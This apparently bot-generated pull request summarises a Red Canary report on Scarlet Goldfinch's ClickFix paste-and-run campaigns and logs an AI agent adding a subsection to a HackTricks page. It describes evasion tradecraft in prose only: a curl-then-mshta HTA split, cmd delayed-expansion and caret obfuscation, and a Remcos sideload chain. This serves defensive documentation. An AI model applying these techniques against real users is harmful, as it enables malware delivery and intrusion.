Scarlet Goldfinch’s year in ClickFix

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/
• Blog Title: Scarlet Goldfinch’s year in ClickFix
• Suggested Section: Windows Hardening -> (new/adapt) Windows tradecraft/defense-evasion notes, or Pentesting Web/Generic Hacking -> Social Engineering/Phishing Methodology (ClickFix/paste-and-run) + Windows LOLBAS (mshta/cmd obfuscation) + DLL Hijacking/Sideloading

🎯 Content Summary

Title / scope
Red Canary documents how the threat cluster it tracks as Scarlet Goldfinch evolved its user-execution initial access tradecraft into paste-and-run (often called ClickFix): victims are socially engineered (CAPTCHA-style “fix” prompts) into copying attacker-provided command lines and executing them via Windows execution surfaces (e.g., command prompt/Run dialog). Red Canary maps this to MITRE ATT&CK T1204.004 – User Execution: Malicious Copy and Pas...

🔧 Technical Details

Paste-and-run (ClickFix) initial access (T1204.004): Present a compromised-site lure (often CAPTCHA/“fix” themed) that instructs the user to copy/paste attacker-controlled commands into Windows execution surfaces. This yields code execution without exploiting a software vulnerability, so prevention must focus on user execution controls, script/command-line telemetry, and hardening against LOLBAS abuse.

HTA execution via LOLBAS + network-evasion split: Use cmd to run curl and download an .hta to disk, then execute it with mshta. By splitting download and execution, defenders relying on detections for mshta-initiated network activity may miss the transfer while mshta still provides initial execution.

CMD obfuscation with delayed expansion + caret escapes + substring indexing: Enable delayed environment variable expansion (cmd.exe /v:on) to build and chain command...

🤖 Agent Actions

I’m mapping the repository first and then I’ll read the most relevant Windows, phishing, LOLBAS, and DLL sideloading pages to find the single best target file without duplicating existing content.
The repo already contains ClickFix and DLL sideloading material, so I’m reading the existing phishing and Windows tradecraft pages now to see whether the Scarlet Goldfinch mechanics are already covered or whether there’s a concrete gap worth adding.
I found the main gap: the phishing page already mentions Scarlet Goldfinch at a high level, but it does not capture the Epoch 7 mechanics that matter for detection, especially cmd.exe /v:on, caret-splitting, substring-based command reconstruction, and the cmd/curl plus mshta split. I’m verifying those details against the source page before editing the existing ClickFix page.
I’ve narrowed it to a single-file update in clipboard-hijacking.md. The file already owns ClickFix tradecraft, and the missing piece is a compact Epoch 7 subsection covering the forfiles to if exist swap, cmd.exe /v:on, caret and substring obfuscation, and the curl to mshta split with the Remcos sideload chain.
The edit is in place. I’m checking the rendered section and diff now to make sure the new material is concise, non-duplicative, and the references section still sits at the end of the file.
Updated clipboard-hijacking.md with a new Scarlet Goldfinch Epoch 7 subsection. I kept it in the existing ClickFix page because the repo already covers the broader DLL sideloading mechanics elsewhere, while this blog adds new paste-and-run tradecraft details that were missing there.

The new content captures the parts not yet documented: the forfiles to if exist detection-surface swap, cmd.exe /v:on delayed expansion, caret-based CMD obfuscation, substring-index reconstruction of curl, the curl to local-HTA plus mshta split to avoid mshta network telemetry, and the follow-on %LOCALAPPDATA% numeric staging plus tar -xf plus Invoke-CimMethod Remcos sideload chain. I also added the Red Canary blog to the file’s ## References section. Verified with git diff and git status; only that single file changed.

---

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

[carlospolop]

🔗 Additional Context

Original Blog Post: https://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/

Content Categories: Based on the analysis, this content was categorized under "Windows Hardening -> (new/adapt) Windows tradecraft/defense-evasion notes, or Pentesting Web/Generic Hacking -> Social Engineering/Phishing Methodology (ClickFix/paste-and-run) + Windows LOLBAS (mshta/cmd obfuscation) + DLL Hijacking/Sideloading".

Repository Maintenance:

• MD Files Formatting: 963 files processed

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0